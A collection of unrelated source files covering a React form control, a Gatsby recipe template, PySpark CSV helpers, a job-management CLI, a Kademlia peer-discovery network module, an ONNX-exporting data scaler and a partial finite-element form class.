export default function Control(props) {
const { name, inputType, type, onChange, placeholder, className, ...rest } = props;
let input = null;
if(inputType === 'textarea'){
input = <textarea type={type} name={name} onChange={onChange} placeholder={placeholder} {...rest} />
} else {
input = <input type={type} name={name} onChange={onChange} placeholder={placeholder} {...rest} />
}
return(
<div className={clsx(styles.control, className)}>
{input}
</div>
)
}
|
import React from 'react'
import { graphql } from 'gatsby'
import Helmet from 'react-helmet'
import get from 'lodash/get'
import Img from 'gatsby-image'
import Layout from '../components/layout'
import heroStyles from '../components/hero.module.css'
import recipeStyles from './recipe.module.css'
class RecipeTemplate extends React.Component {
render() {
const recipe = get(this.props, 'data.contentfulRecipe')
const siteTitle = get(this.props, 'data.site.siteMetadata.title')
console.log(recipe);
return (
<Layout location={this.props.location} >
<div style={{ background: '#fff' }}>
<Helmet title={`${recipe.title} | ${siteTitle}`} />
<div className={heroStyles.hero}>
<Img className={heroStyles.heroImage} alt={recipe.title} fluid={recipe.heroImage.fluid} />
</div>
<div className="wrapper">
<h1 className="section-headline">{recipe.title}</h1>
<p
style={{
display: 'block',
}}
>
</p>
<div
className="section-headline"
dangerouslySetInnerHTML={{
__html: recipe.instructions.instructions,
}}
/>
{recipe.ingredients &&
<div>
<span className={recipeStyles.title}>Ingredients</span>
<ul>
{recipe.ingredients.list.map(ingredient => (
<li key={ingredient}>
{ingredient}
</li>
))}
</ul>
</div>
}
</div>
</div>
</Layout>
)
}
}
export default RecipeTemplate
export const pageQuery = graphql`
query RecipeBySlug($slug: String!) {
site {
siteMetadata {
title
}
}
contentfulRecipe(slug: { eq: $slug }) {
title
orderIndex
heroImage {
fluid(maxWidth: 1180, background: "rgb:000000") {
...GatsbyContentfulFluid_tracedSVG
}
}
instructions {
instructions
}
ingredients {
list
}
}
}
`
|
from pyspark import SparkConf, SparkContext
from pyspark.sql import SparkSession, SQLContext
def get_spark_session():
# load Spark session
spark = SparkSession.builder.master("local[64]").appName("PySparkShell").getOrCreate()
conf = SparkConf().setAppName("PySparkShell").setMaster("local[64]")
sc = SparkContext.getOrCreate(conf)
sqlContext = SQLContext(sc)
return spark, sc, sqlContext
def read_csv(spark, infile):
return spark.read \
.option("header", "true") \
.option("inferSchema", "true") \
.csv(infile)
def write_csv(df, outfile):
df.write.csv(outfile, header=True)
|
# -*- coding: utf-8 -*-
import click
import sys
from askanna import job as aa_job
from askanna import project as aa_project
from askanna.cli.utils import ask_which_job, ask_which_project, ask_which_workspace
from askanna.core.config import Config
from askanna.core.utils import extract_push_target
config = Config()
@click.group()
def cli1():
pass
@cli1.command(help="List jobs available in AskAnna",
short_help="List jobs")
@click.option(
"--project", "-p", "project_suuid",
required=False,
type=str,
help="Project SUUID to list jobs for a project"
)
def list(project_suuid):
jobs = aa_job.list(project_suuid)
if not jobs:
click.echo("Based on the information provided, we cannot find any jobs.")
sys.exit(0)
elif project_suuid:
project = aa_project.detail(project_suuid)
print("The jobs for project \"{}\" are:\n".format(project.name))
print("JOB SUUID JOB NAME")
print("------------------- -------------------------")
else:
print("PROJECT SUUID PROJECT NAME JOB SUUID JOB NAME")
print("------------------- -------------------- ------------------- -------------------------")
for job in sorted(jobs, key=lambda x: (x.project["name"], x.name)):
if project_suuid:
print("{job_suuid} {job_name}".format(
job_suuid=job.short_uuid,
job_name=job.name[:25]))
else:
print("{project_suuid} {project_name} {job_suuid} {job_name}".format(
project_suuid=job.project["short_uuid"],
project_name="{:20}".format(job.project["name"])[:20],
job_suuid=job.short_uuid,
job_name=job.name[:25]))
@click.group()
def cli2():
pass
@cli2.command(help="Change job information in AskAnna", short_help="Change job")
@click.option("--id", "-i", "suuid", required=False, type=str, help="Job SUUID")
@click.option("--name", "-n", required=False, type=str, help="New name to set")
@click.option("--description", "-d", required=False, type=str, help="New description to set")
def change(suuid, name, description):
if not suuid:
try:
push_target = extract_push_target(config.push_target)
except ValueError as e: # noqa
# the push-target is not set, so don't bother reading it
project_suuid = None
else:
project_suuid = push_target.get("project_suuid")
if not project_suuid:
workspace = ask_which_workspace(question="From which workspace do you want to change a job?")
project = ask_which_project(question="From which project do you want to change a job?",
workspace_suuid=workspace.short_uuid)
project_suuid = project.short_uuid
job = ask_which_job(question="Which job do you want to change?", project_suuid=project_suuid)
suuid = job.short_uuid
if not name and not description:
if click.confirm("\nDo you want to change the name of the job?"):
name = click.prompt("New name of the job", type=str)
if click.confirm("\nDo you want to change the description of the job?"):
description = click.prompt("New description of the job", type=str)
click.confirm("\nDo you want to change the job?", abort=True)
aa_job.change(suuid=suuid, name=name, description=description)
cli = click.CommandCollection(sources=[cli1, cli2], help="Manage your jobs in AskAnna",
short_help="Manage jobs in AskAnna")
|
import itertools
from typing import (
AsyncContextManager,
AsyncIterator,
Collection,
Dict,
List,
Optional,
Set,
Tuple,
)
from async_generator import asynccontextmanager
from async_service import Service, background_trio_service
from eth_enr import ENRAPI, ENRManagerAPI, QueryableENRDatabaseAPI
from eth_enr.exceptions import OldSequenceNumber
from eth_typing import NodeID
from eth_utils import ValidationError, get_extended_debug_logger
from eth_utils.toolz import cons, first, take
from lru import LRU
import trio
from ddht._utils import adaptive_timeout, every, reduce_enrs, weighted_choice
from ddht.base_message import InboundMessage
from ddht.constants import ROUTING_TABLE_BUCKET_SIZE
from ddht.endpoint import Endpoint
from ddht.exceptions import (
DuplicateProtocol,
EmptyFindNodesResponse,
MissingEndpointFields,
)
from ddht.kademlia import (
KademliaRoutingTable,
at_log_distance,
compute_log_distance,
iter_closest_nodes,
)
from ddht.token_bucket import TokenBucket
from ddht.v5_1.abc import (
ClientAPI,
DispatcherAPI,
EventsAPI,
NetworkAPI,
NetworkProtocol,
PoolAPI,
TalkProtocolAPI,
)
from ddht.v5_1.constants import ROUTING_TABLE_KEEP_ALIVE
from ddht.v5_1.exceptions import ProtocolNotSupported
from ddht.v5_1.explorer import Explorer
from ddht.v5_1.messages import (
FindNodeMessage,
PingMessage,
PongMessage,
TalkRequestMessage,
)
from ddht.validation import validate_found_nodes_distances
UNRESPONSIVE_CACHE = LRU(2048)
@asynccontextmanager
async def common_recursive_find_nodes(
network: NetworkProtocol,
target: NodeID,
*,
concurrency: int = 3,
unresponsive_cache: Dict[NodeID, float] = UNRESPONSIVE_CACHE,
) -> AsyncIterator[trio.abc.ReceiveChannel[ENRAPI]]:
"""
An optimized version of the recursive lookup algorithm for a kademlia
network.
Continually lookup nodes in the target part of the network, keeping track
of all of the nodes we have seen.
Exit once we have queried all of the `k` closest nodes to the target.
The concurrency structure here is optimized to minimize the effect of
unresponsive nodes on the total time it takes to perform the recursive
lookup. Some requests will hang for up to 10 seconds. The
`adaptive_timeout` combined with the multiple concurrent workers helps
mitigate the overall slowdown caused by a few unresponsive nodes since the
other queries can be issues concurrently.
"""
network.logger.debug2("Recursive find nodes: %s", target.hex())
start_at = trio.current_time()
# The set of NodeID values we have already queried.
queried_node_ids: Set[NodeID] = set()
# The set of NodeID that timed out
#
# The `local_node_id` is
# included in this as a convenience mechanism so that we don't have to
# continually fiter it out of the various filters
unresponsive_node_ids: Set[NodeID] = {network.local_node_id}
# We maintain a cache of nodes that were recently deemed unresponsive
# within the last 10 minutes.
unresponsive_node_ids.update(
node_id
for node_id, last_unresponsive_at in unresponsive_cache.items()
if trio.current_time() - last_unresponsive_at < 300
)
# Accumulator of the node_ids we have seen
received_node_ids: Set[NodeID] = set()
# Tracker for node_ids that are actively being requested.
in_flight: Set[NodeID] = set()
condition = trio.Condition()
def get_unqueried_node_ids() -> Tuple[NodeID, ...]:
"""
Get the three nodes that are closest to the target such that the node
is in the closest `k` nodes which haven't been deemed unresponsive.
"""
# Construct an iterable of *all* the nodes we know about ordered by
# closeness to the target.
candidates = iter_closest_nodes(
target, network.routing_table, received_node_ids
)
# Remove any unresponsive nodes from that iterable
responsive_candidates = itertools.filterfalse(
lambda node_id: node_id in unresponsive_node_ids, candidates
)
# Grab the closest K
closest_k_candidates = take(
network.routing_table.bucket_size, responsive_candidates,
)
# Filter out any from the closest K that we've already queried or that are in-flight
closest_k_unqueried = itertools.filterfalse(
lambda node_id: node_id in queried_node_ids or node_id in in_flight,
closest_k_candidates,
)
return tuple(take(3, closest_k_unqueried))
async def do_lookup(
node_id: NodeID, send_channel: trio.abc.SendChannel[ENRAPI]
) -> None:
"""
Perform an individual lookup on the target part of the network from the
given `node_id`
"""
if node_id == target:
distance = 0
else:
distance = compute_log_distance(node_id, target)
try:
found_enrs = await network.find_nodes(node_id, distance)
except (trio.TooSlowError, MissingEndpointFields, ValidationError):
unresponsive_node_ids.add(node_id)
unresponsive_cache[node_id] = trio.current_time()
return
except trio.Cancelled:
# We don't add these to the unresponsive cache since they didn't
# necessarily exceed the fulle 10s request/response timeout.
unresponsive_node_ids.add(node_id)
raise
for enr in found_enrs:
try:
network.enr_db.set_enr(enr)
except OldSequenceNumber:
pass
async with condition:
new_enrs = tuple(
enr for enr in found_enrs if enr.node_id not in received_node_ids
)
received_node_ids.update(enr.node_id for enr in new_enrs)
for enr in new_enrs:
try:
await send_channel.send(enr)
except (trio.BrokenResourceError, trio.ClosedResourceError):
# In the event that the consumer of `recursive_find_nodes`
# exits early before the lookup has completed we can end up
# operating on a closed channel.
return
async def worker(
worker_id: NodeID, send_channel: trio.abc.SendChannel[ENRAPI]
) -> None:
"""
Pulls unqueried nodes from the closest k nodes and performs a
concurrent lookup on them.
"""
for round in itertools.count():
async with condition:
node_ids = get_unqueried_node_ids()
if not node_ids:
await condition.wait()
continue
# Mark the node_ids as having been queried.
queried_node_ids.update(node_ids)
# Mark the node_ids as being in-flight.
in_flight.update(node_ids)
# Some of the node ids may have come from our routing table.
# These won't be present in the `received_node_ids` so we
# detect this here and send them over the channel.
try:
for node_id in node_ids:
if node_id not in received_node_ids:
enr = network.enr_db.get_enr(node_id)
received_node_ids.add(node_id)
await send_channel.send(enr)
except (trio.BrokenResourceError, trio.ClosedResourceError):
# In the event that the consumer of `recursive_find_nodes`
# exits early before the lookup has completed we can end up
# operating on a closed channel.
return
if len(node_ids) == 1:
await do_lookup(node_ids[0], send_channel)
else:
tasks = tuple(
(do_lookup, (node_id, send_channel)) for node_id in node_ids
)
try:
await adaptive_timeout(*tasks, threshold=1, variance=2.0)
except trio.TooSlowError:
pass
async with condition:
# Remove the `node_ids` from the in_flight set.
in_flight.difference_update(node_ids)
condition.notify_all()
async def _monitor_done(send_channel: trio.abc.SendChannel[ENRAPI]) -> None:
async with send_channel:
async with condition:
while True:
# this `fail_after` is a failsafe to prevent deadlock situations
# which are possible with `Condition` objects.
with trio.move_on_after(60) as scope:
node_ids = get_unqueried_node_ids()
if not node_ids and not in_flight:
break
else:
await condition.wait()
if scope.cancelled_caught:
network.logger.error("Deadlock")
send_channel, receive_channel = trio.open_memory_channel[ENRAPI](256)
async with trio.open_nursery() as nursery:
nursery.start_soon(_monitor_done, send_channel)
for worker_id in range(concurrency):
nursery.start_soon(worker, worker_id, send_channel)
async with receive_channel:
yield receive_channel
nursery.cancel_scope.cancel()
elapsed = trio.current_time() - start_at
network.logger.debug(
"Lookup for %s finished in %f seconds: seen=%d queried=%d unresponsive=%d",
target.hex(),
elapsed,
len(received_node_ids),
len(queried_node_ids),
len(unresponsive_node_ids),
)
@asynccontextmanager
async def common_network_stream_find_nodes(
network: NetworkAPI,
node_id: NodeID,
endpoint: Endpoint,
distances: Collection[int],
*,
request_id: Optional[bytes] = None,
) -> AsyncIterator[trio.abc.ReceiveChannel[ENRAPI]]:
if not distances:
raise TypeError("Must provide at least one distance")
if endpoint is None:
endpoint = await network.endpoint_for_node_id(node_id)
async def _stream_find_nodes_response(
send_channel: trio.abc.SendChannel[ENRAPI],
) -> None:
async with network.client.stream_find_nodes(
node_id, endpoint, distances=distances, request_id=request_id
) as resp_aiter:
async with send_channel:
async for response in resp_aiter:
enrs = response.message.enrs
for enr in enrs:
try:
await send_channel.send(enr)
except (trio.BrokenResourceError, trio.ClosedResourceError):
break
send_channel, receive_channel = trio.open_memory_channel[ENRAPI](256)
async with trio.open_nursery() as nursery:
nursery.start_soon(
_stream_find_nodes_response, send_channel,
)
try:
async with receive_channel:
try:
yield receive_channel
except trio.EndOfChannel as err:
raise trio.TooSlowError from err
finally:
nursery.cancel_scope.cancel()
class Network(Service, NetworkAPI):
_bootnodes: Tuple[ENRAPI, ...]
_talk_protocols: Dict[bytes, TalkProtocolAPI]
def __init__(self, client: ClientAPI, bootnodes: Collection[ENRAPI],) -> None:
self.logger = get_extended_debug_logger("ddht.Network")
self.client = client
self._bootnodes = tuple(bootnodes)
self.routing_table = KademliaRoutingTable(
self.client.enr_manager.enr.node_id, ROUTING_TABLE_BUCKET_SIZE,
)
self._routing_table_ready = trio.Event()
self._last_pong_at = LRU(2048)
self._talk_protocols = {}
self._ping_handler_ready = trio.Event()
self._find_nodes_handler_ready = trio.Event()
async def ready(self) -> None:
await self._ping_handler_ready.wait()
await self._find_nodes_handler_ready.wait()
#
# Proxied ClientAPI properties
#
@property
def local_node_id(self) -> NodeID:
return self.client.local_node_id
@property
def events(self) -> EventsAPI:
return self.client.events
@property
def dispatcher(self) -> DispatcherAPI:
return self.client.dispatcher
@property
def enr_manager(self) -> ENRManagerAPI:
return self.client.enr_manager
@property
def pool(self) -> PoolAPI:
return self.client.pool
@property
def enr_db(self) -> QueryableENRDatabaseAPI:
return self.client.enr_db
#
# TALK API
#
def add_talk_protocol(self, protocol: TalkProtocolAPI) -> None:
if protocol.protocol_id in self._talk_protocols:
raise DuplicateProtocol(
f"A protocol is already registered for '{protocol.protocol_id!r}'"
)
self._talk_protocols[protocol.protocol_id] = protocol
#
# High Level API
#
async def bond(
self, node_id: NodeID, *, endpoint: Optional[Endpoint] = None
) -> bool:
self.logger.debug2(
"Bonding with %s", node_id.hex(),
)
try:
pong = await self.ping(node_id, endpoint=endpoint)
except trio.TooSlowError:
self.logger.debug("Bonding with %s timed out during ping", node_id.hex())
return False
except MissingEndpointFields:
self.logger.debug(
"Bonding with %s failed due to missing endpoint information",
node_id.hex(),
)
return False
try:
enr = await self.lookup_enr(
node_id, enr_seq=pong.enr_seq, endpoint=endpoint
)
except trio.TooSlowError:
self.logger.debug(
"Bonding with %s timed out during ENR retrieval", node_id.hex(),
)
return False
except EmptyFindNodesResponse:
self.logger.debug(
"Bonding with %s failed due to them not returing their ENR record",
node_id.hex(),
)
return False
self.routing_table.update(enr.node_id)
self.logger.debug(
"Bonded with %s successfully", node_id.hex(),
)
self._routing_table_ready.set()
return True
async def _bond(self, node_id: NodeID, endpoint: Optional[Endpoint] = None) -> None:
await self.bond(node_id, endpoint=endpoint)
async def ping(
self,
node_id: NodeID,
*,
endpoint: Optional[Endpoint] = None,
request_id: Optional[bytes] = None,
) -> PongMessage:
if endpoint is None:
endpoint = await self.endpoint_for_node_id(node_id)
response = await self.client.ping(node_id, endpoint, request_id=request_id)
return response.message
async def find_nodes(
self,
node_id: NodeID,
*distances: int,
endpoint: Optional[Endpoint] = None,
request_id: Optional[bytes] = None,
) -> Tuple[ENRAPI, ...]:
if not distances:
raise TypeError("Must provide at least one distance")
if endpoint is None:
endpoint = await self.endpoint_for_node_id(node_id)
responses = await self.client.find_nodes(
node_id, endpoint, distances=distances, request_id=request_id
)
# Validate that all responses are indeed at one of the
# specified distances.
for response in responses:
validate_found_nodes_distances(response.message.enrs, node_id, distances)
return tuple(enr for response in responses for enr in response.message.enrs)
def stream_find_nodes(
self,
node_id: NodeID,
endpoint: Endpoint,
distances: Collection[int],
*,
request_id: Optional[bytes] = None,
) -> AsyncContextManager[trio.abc.ReceiveChannel[ENRAPI]]:
return common_network_stream_find_nodes(
self, node_id, endpoint, distances, request_id=request_id
)
async def talk(
self,
node_id: NodeID,
*,
protocol: bytes,
payload: bytes,
endpoint: Optional[Endpoint] = None,
request_id: Optional[bytes] = None,
) -> bytes:
if endpoint is None:
endpoint = await self.endpoint_for_node_id(node_id)
response = await self.client.talk(
node_id, endpoint, protocol, payload, request_id=request_id
)
payload = response.message.payload
if not payload:
raise ProtocolNotSupported(protocol)
return response.message.payload
async def lookup_enr(
self, node_id: NodeID, *, enr_seq: int = 0, endpoint: Optional[Endpoint] = None
) -> ENRAPI:
if node_id == self.local_node_id:
raise Exception(f"Cannot lookup local ENR: node_id={node_id.hex()}")
try:
enr = self.enr_db.get_enr(node_id)
except KeyError:
if endpoint is None:
# Try to use a recursive network lookup to find the desired
# node.
async with self.recursive_find_nodes(node_id) as enr_aiter:
async for found_enr in enr_aiter:
if found_enr.node_id == node_id:
endpoint = Endpoint.from_enr(found_enr)
break
else:
# we weren't given an endpoint and we don't have an enr which would give
# us an endpoint, there's no way to reach this node.
raise KeyError(f"Could not find ENR: node_id={node_id.hex()}")
else:
if enr.sequence_number >= enr_seq:
return enr
enr = await self._fetch_enr(node_id, endpoint=endpoint)
try:
self.enr_db.set_enr(enr)
except OldSequenceNumber:
pass
return enr
async def _fetch_enr(
self, node_id: NodeID, *, endpoint: Optional[Endpoint]
) -> ENRAPI:
enrs = await self.find_nodes(node_id, 0, endpoint=endpoint)
if not enrs:
raise EmptyFindNodesResponse(f"{node_id.hex()} did not return its ENR")
# Assuming we're given enrs for a single node, this reduce returns the enr for
# that node with the highest sequence number
return reduce_enrs(enrs)[0]
def recursive_find_nodes(
self, target: NodeID
) -> AsyncContextManager[trio.abc.ReceiveChannel[ENRAPI]]:
return common_recursive_find_nodes(self, target)
@asynccontextmanager
async def explore(
self, target: NodeID, concurrency: int = 3,
) -> AsyncIterator[trio.abc.ReceiveChannel[ENRAPI]]:
explorer = Explorer(self, target, concurrency)
with trio.move_on_after(300) as scope:
async with background_trio_service(explorer):
await explorer.ready()
async with explorer.stream() as receive_channel:
yield receive_channel
if scope.cancelled_caught:
self.logger.error("Timeout from `stream_locate`")
#
# Long Running Processes
#
async def run(self) -> None:
self.manager.run_daemon_child_service(self.client)
await self.client.wait_listening()
self.manager.run_daemon_task(self._periodically_report_routing_table)
self.manager.run_daemon_task(self._ping_oldest_routing_table_entry)
self.manager.run_daemon_task(self._track_last_pong)
self.manager.run_daemon_task(self._manage_routing_table)
self.manager.run_daemon_task(self._pong_when_pinged)
self.manager.run_daemon_task(self._serve_find_nodes)
self.manager.run_daemon_task(self._handle_unhandled_talk_requests)
await self.manager.wait_finished()
async def _periodically_report_routing_table(self) -> None:
async for _ in every(30, initial_delay=10):
non_empty_buckets = tuple(
reversed(
tuple(
(idx, bucket)
for idx, bucket in enumerate(self.routing_table.buckets, 1)
if bucket
)
)
)
total_size = sum(len(bucket) for idx, bucket in non_empty_buckets)
bucket_info = "|".join(
tuple(
f"{idx}:{'F' if len(bucket) == self.routing_table.bucket_size else len(bucket)}"
for idx, bucket in non_empty_buckets
)
)
self.logger.debug(
"routing-table-info: size=%d buckets=%s", total_size, bucket_info,
)
async def _ping_oldest_routing_table_entry(self) -> None:
await self._routing_table_ready.wait()
while self.manager.is_running:
# Here we preserve the lazy iteration while still checking that the
# iterable is not empty before passing it into `min` below which
# throws an ambiguous `ValueError` otherwise if the iterable is
# empty.
nodes_iter = self.routing_table.iter_all_random()
try:
first_node_id = first(nodes_iter)
except StopIteration:
await trio.sleep(ROUTING_TABLE_KEEP_ALIVE)
continue
else:
least_recently_ponged_node_id = min(
cons(first_node_id, nodes_iter),
key=lambda node_id: self._last_pong_at.get(node_id, 0),
)
too_old_at = trio.current_time() - ROUTING_TABLE_KEEP_ALIVE
try:
last_pong_at = self._last_pong_at[least_recently_ponged_node_id]
except KeyError:
pass
else:
if last_pong_at > too_old_at:
await trio.sleep(last_pong_at - too_old_at)
continue
did_bond = await self.bond(least_recently_ponged_node_id)
if not did_bond:
self.routing_table.remove(least_recently_ponged_node_id)
async def _track_last_pong(self) -> None:
async with self.dispatcher.subscribe(PongMessage) as subscription:
async for message in subscription:
self._last_pong_at[message.sender_node_id] = trio.current_time()
async def _manage_routing_table(self) -> None:
# First load all the bootnode ENRs into our database
for enr in self._bootnodes:
try:
self.enr_db.set_enr(enr)
except OldSequenceNumber:
pass
# Now repeatedly try to bond with each bootnode until one succeeds.
while self.manager.is_running:
with trio.move_on_after(20):
async with trio.open_nursery() as nursery:
for enr in self._bootnodes:
if enr.node_id == self.local_node_id:
continue
endpoint = Endpoint.from_enr(enr)
nursery.start_soon(self._bond, enr.node_id, endpoint)
await self._routing_table_ready.wait()
break
# Now we enter into an infinite loop that continually probes the
# network to beep the routing table fresh. We both perform completely
# random lookups, as well as targeted lookups on the outermost routing
# table buckets which are not full.
#
# The `TokenBucket` allows us to burst at the beginning, making quick
# successive probes, then slowing down once the
#
# TokenBucket starts with 10 tokens, refilling at 1 token every 30
# seconds.
token_bucket = TokenBucket(1 / 30, 10)
async with trio.open_nursery() as nursery:
while self.manager.is_running:
await token_bucket.take()
# Get the logarithmic distance to the "largest" buckets
# that are not full.
non_full_bucket_distances = tuple(
idx + 1
for idx, bucket in enumerate(self.routing_table.buckets)
if len(bucket) < self.routing_table.bucket_size # noqa: E501
)[-16:]
# Probe one of the not-full-buckets with a weighted preference
# towards the largest buckets.
distance_to_probe = weighted_choice(non_full_bucket_distances)
target_node_id = at_log_distance(self.local_node_id, distance_to_probe)
async with self.recursive_find_nodes(target_node_id) as enr_aiter:
async for enr in enr_aiter:
if enr.node_id == self.local_node_id:
continue
try:
self.enr_db.set_enr(enr)
except OldSequenceNumber:
pass
nursery.start_soon(self._bond, enr.node_id)
async def _pong_when_pinged(self) -> None:
async def _maybe_add_to_routing_table(
request: InboundMessage[PingMessage],
) -> None:
try:
enr = await self.lookup_enr(
request.sender_node_id,
enr_seq=request.message.enr_seq,
endpoint=request.sender_endpoint,
)
except (trio.TooSlowError, EmptyFindNodesResponse):
return
self.routing_table.update(enr.node_id)
self._routing_table_ready.set()
async with trio.open_nursery() as nursery:
async with self.dispatcher.subscribe(PingMessage) as subscription:
self._ping_handler_ready.set()
async for request in subscription:
await self.dispatcher.send_message(
request.to_response(
PongMessage(
request.request_id,
self.enr_manager.enr.sequence_number,
request.sender_endpoint.ip_address,
request.sender_endpoint.port,
)
)
)
nursery.start_soon(_maybe_add_to_routing_table, request)
async def _serve_find_nodes(self) -> None:
async with self.dispatcher.subscribe(FindNodeMessage) as subscription:
self._find_nodes_handler_ready.set()
async for request in subscription:
response_enrs: List[ENRAPI] = []
distances = set(request.message.distances)
if len(distances) != len(request.message.distances):
self.logger.debug(
"Ignoring invalid FindNodeMessage from %s@%s: duplicate distances",
request.sender_node_id.hex(),
request.sender_endpoint,
)
continue
elif not distances:
self.logger.debug(
"Ignoring invalid FindNodeMessage from %s@%s: empty distances",
request.sender_node_id.hex(),
request.sender_endpoint,
)
continue
elif any(
distance > self.routing_table.num_buckets for distance in distances
):
self.logger.debug(
"Ignoring invalid FindNodeMessage from %s@%s: distances: %s",
request.sender_node_id.hex(),
request.sender_endpoint,
distances,
)
continue
for distance in distances:
if distance == 0:
response_enrs.append(self.enr_manager.enr)
elif distance <= self.routing_table.num_buckets:
node_ids_at_distance = self.routing_table.get_nodes_at_log_distance(
distance,
)
for node_id in node_ids_at_distance:
response_enrs.append(self.enr_db.get_enr(node_id))
else:
raise Exception("Should be unreachable")
await self.client.send_found_nodes(
request.sender_node_id,
request.sender_endpoint,
enrs=response_enrs,
request_id=request.request_id,
)
async def _handle_unhandled_talk_requests(self) -> None:
async with self.dispatcher.subscribe(TalkRequestMessage) as subscription:
async for request in subscription:
if request.message.protocol not in self._talk_protocols:
self.logger.debug("Unhandled TALKREQ: %s", request)
await self.client.send_talk_response(
request.sender_node_id,
request.sender_endpoint,
payload=b"",
request_id=request.message.request_id,
)
#
# Utility
#
async def endpoint_for_node_id(self, node_id: NodeID) -> Endpoint:
try:
enr = self.enr_db.get_enr(node_id)
except KeyError:
enr = await self.lookup_enr(node_id)
return Endpoint.from_enr(enr)
|
##############################################################################
# Copyright 2020 IBM Corp. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
import pandas as pd
from . import DFPBase
from sklearn.preprocessing import MinMaxScaler
from sklearn.preprocessing import StandardScaler
import onnx
from onnx import helper
class Scaler(DFPBase):
"""
Normalize column values based on a strategy.
Parameters
----------
inputs : List of strings
Each string is an input column label.
outputs : List of strings
Each string is an output column label.
strategy : String
minmax : This is same as MinMaxScaler of scikit-learn
standard: This is same as StandardScaler of scikit-learn
min: Subtract the min value in a column from the values in the column
"""
def __init__(
self,
inputs=[],
outputs=[],
strategy = None,
):
self.inputs = inputs
self.outputs = outputs
self.strategy = strategy
self.scaler = None
self.mins = []
if strategy is 'minmax':
self.scaler = MinMaxScaler()
elif strategy is 'standard':
self.scaler = StandardScaler()
elif strategy is 'min':
pass
assert strategy == 'min' or self.scaler != None, "Not implemented it yet"
def fit(self, df, **params):
if self.strategy == 'min':
for input in self.inputs:
self.mins.append(df[input].min())
else:
if len(df.index) > 0:
self.scaler.fit(df[self.inputs])
return self
def transform(self, df):
if self.strategy == 'min':
for input, output, m in zip(self.inputs, self.outputs, self.mins):
df[output] = df[input] - m
else:
if len(df.index) > 0:
df[self.outputs] = self.scaler.transform(df[self.inputs])
return df
def __to_onnx_operator_for_min(self, graph):
for input_column, output_column, m in zip(self.inputs, self.outputs, self.mins):
input_tensor = graph.get_current_tensor(input_column)
output_tensor = graph.get_next_tensor(output_column, input_tensor.type)
kwargs = {}
if graph.is_int_tensor(input_tensor.type):
kwargs['value_int'] = int(m)
elif graph.is_float_tensor(input_tensor.type):
kwargs['value_float'] = float(m)
else:
assert False, input_column + ' column is not a numeric type'
ops = []
min_tensor = graph.get_tmp_tensor()
ops.append(helper.make_node('Constant', [], [min_tensor], graph.get_node_name('Constant'), **kwargs))
ops.append(helper.make_node('Sub', [input_tensor.name, min_tensor], [output_tensor.name], graph.get_node_name('Sub')))
graph.add([input_tensor], [output_tensor], ops)
def to_onnx_operator(self, graph):
if self.strategy == 'min':
self.__to_onnx_operator_for_min(graph)
return
for i, (input_column, output_column) in enumerate(zip(self.inputs, self.outputs)):
input_tensor = graph.get_current_tensor(input_column)
output_tensor = graph.get_next_tensor(output_column, input_tensor.type)
kwargs = {}
if self.strategy == 'minmax':
kwargs['offset'] = [float(self.scaler.data_min_[i])]
elif self.strategy == 'standard':
kwargs['offset'] = [float(self.scaler.mean_[i])]
else:
assert False, 'Unsupported strategy ' + self.strategy
kwargs['scale'] = [float(self.scaler.scale_[i])]
graph.add([input_tensor], [output_tensor], [helper.make_node('Scaler', [input_tensor.name], [output_tensor.name], graph.get_node_name('Scaler'), domain='ai.onnx.ml', **kwargs)])
|
# -*- coding: utf-8 -*-
import sys
if './' not in sys.path: sys.path.append('./')
from numpy import array
from itertools import chain
from screws.freeze.main import FrozenOnly
from tools.linear_algebra.gathering.regular.matrix.main import Gathering_Matrix
from tools.linear_algebra.gathering.vector import Gathering_Vector
from tools.linear_algebra.elementwise_cache.objects.sparse_matrix.main import EWC_SparseMatrix
from tools.linear_algebra.elementwise_cache.objects.column_vector.main import EWC_ColumnVector
from objects.CSCG._3d.forms.standard._1s.special.vortex_detection import \
___3dCSCG_1Form_Vortex_Detection___
from objects.CSCG._3d.forms.standard._1s.special.helpers.cross_product_1__ip_1 import \
___3dCSCG_1Form_CrossProduct_1__ip_1___
from objects.CSCG._3d.forms.standard._1s.special.helpers.cross_product_2__ip_2 import \
___3dCSCG_1Form_CrossProduct_2__ip_2___
from root.config.main import cOmm, MPI
class _1Form_Special(FrozenOnly):
def __init__(self, _1sf):
self._sf_ = _1sf
self._vortex_detection_ = None
self._freeze_self_()
def cross_product_1f__ip_1f(self, u, e, quad_degree=None, output='2-M-1'):
"""
(self X 1-form, 1-form). To first cross product with a 1-form then do an inner product with
another 1-form.
output:
'2-M-1': Means we return a local matrix refers to local dofs of e(column) and u (row)
:return:
"""
if output == '2-M-1':
SCP_generator = ___3dCSCG_1Form_CrossProduct_1__ip_1___(self._sf_, u, e, quad_degree=quad_degree)
else:
raise NotImplementedError(f"output={output} is not implemented.")
return EWC_SparseMatrix(self._sf_.mesh.elements, SCP_generator, 'no_cache')
def cross_product_2f__ip_2f(self, u, e, quad_degree=None, output='2-M-1'):
"""
(self X 2-form, 2-form). To first cross product with a 2-form then do an inner product with
another 2-form.
output:
'2-M-1': Means we return a local matrix refers to local dofs of e (column) and u (row)
:return:
"""
if output == '2-M-1':
SCP_generator = ___3dCSCG_1Form_CrossProduct_2__ip_2___(self._sf_, u, e, quad_degree=quad_degree)
else:
raise NotImplementedError(f"output={output} is not implemented.")
return EWC_SparseMatrix(self._sf_.mesh.elements, SCP_generator, 'no_cache')
@property
def vortex_detection(self):
if self._vortex_detection_ is None:
self._vortex_detection_ = ___3dCSCG_1Form_Vortex_Detection___(self._sf_)
return self._vortex_detection_
def hybrid_pairing(self, adt1, e1, time=0):
""""""
assert adt1.__class__.__name__ == '_3dCSCG_T1_ADF', f"I need a 3dCSCG AD-Trace-1-form."
assert e1.__class__.__name__ == '_3dCSCG_1Edge', f"I need a 3dCSCG 1-edge-form."
sf = self._sf_
mesh = sf.mesh
assert sf.TW.BC.body is not None, f'3dCSCG primal 1-sf has no TW.BC function.'
assert sf.BC.valid_boundaries is not None, f'3dCSCG primal 1-sf has no valid boundary.'
assert adt1.prime.TW.BC.body is not None, f'3dCSCG ad-1-trace has no TW.BC function.'
assert adt1.BC.valid_boundaries is not None, f'3dCSCG ad-1-trace has no valid boundary.'
sf.TW.do.push_BC_to_instant(time)
